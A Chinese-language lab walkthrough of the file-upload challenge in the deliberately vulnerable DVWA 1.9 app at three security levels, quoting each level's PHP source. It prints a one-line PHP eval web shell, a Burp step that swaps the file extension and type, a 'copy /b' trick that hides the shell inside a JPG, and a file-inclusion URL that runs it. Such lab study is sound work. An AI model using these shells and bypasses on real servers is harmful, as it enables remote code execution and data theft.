测试平台使用的DVWA 1.9 版本 +phpStudy环境测试
1.low级别
源码分析:
<?php
if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; }
}
?>
这个级别中没有过滤函数,上传一句话木马文件<?php @eval($_POST["pass"]);?> php文件,使用菜刀连接即可获取数据库信息,在连接的过程中要注意使用burp进行抓包,在中国菜刀上连接dvwa时默认的cookie是impossible模式,使用burp拦截请求后在请求头信息中添加cookie信息:Cookie: security=low; PHPSESSID=n693sr05jbtn03nh63ageq57j1 后可解决连接失败的问题。
2.medium级别
源码分析:
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; }
} ?>
这个级别只对文件名进行过滤,上传漏洞构建的思路是,先把php一句话木马保存成png的模式,在点击上传之前使用burpsuit拦截包,然后在burp中修改文件后缀名为php文件,即可成功上传。最后使用菜刀连接即可。
3.high级别
源码分析:
<?php
if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
//返回文件名$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
//返回后缀名$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; }
}
?>
函数解析:
? stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)
? strpos() - 查找字符串在另一字符串中第一次出现的位置(区分大小写)
? strripos() - 查找字符串在另一字符串中最后一次出现的位置(不区分大小写)
? strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。(区分大小写)
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
在真实的环境下测试函数:
$checkImage=getimagesize($fileTmpName);
var_dump($checkImage);输出结果:
array (size=7)0 => int 10241 => int 5832 => int 23 => string 'width="1024" height="583"' (length=25)'bits' => int 8'channels' => int 3'mime' => string 'image/jpeg' (length=10)
经过上面的分析,我们在一张真正的图片后添加一段一句话木马,在cmd框中执行下面命令:
copy 11.jpg/b+11.php/a 123.jpg
把生成的图片上传到服务器,然后使用菜刀连接,直接连接的话是不能识别图片木马的,在这里使用下面路径连接:
http://192.168.15.201/DVWA-1.9/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\DVWA-1.9\hackable\uploads\123.jpg